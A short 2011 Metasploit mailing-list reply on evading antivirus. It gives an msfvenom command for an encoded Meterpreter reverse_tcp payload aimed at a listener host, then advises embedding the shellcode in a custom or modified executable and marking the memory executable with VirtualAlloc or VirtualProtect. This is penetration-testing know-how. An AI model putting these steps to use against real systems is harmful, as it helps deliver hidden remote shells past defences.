Metasploit mailing list archives

Re: Yet another AV bypassing question

From: scriptjunkie <scriptjunkie1 () googlemail com>
Date: Fri, 24 Jun 2011 22:28:57 -0500

In short, no it's probably not the DLL. The DLL is not embedded in an
executable that Metasploit generates. Try generating a c version of
the payload:
ruby msfvenom -p windows/meterpreter/reverse_tcp -f c -e
x86/shikata_ga_nai LHOST=1.2.3.4
and create your own exe or modify the source of an existing one to run
that code. You will need to make it executable before it can be
executed as code, look up VirtualAlloc or VirtualProtect. There are
plenty of other ways, but that's my favorite. See http://j.mp/mjyb8e
if you want to see what goes into an MSF generated exe.

On Fri, Jun 24, 2011 at 6:55 PM, Average SecurityGuy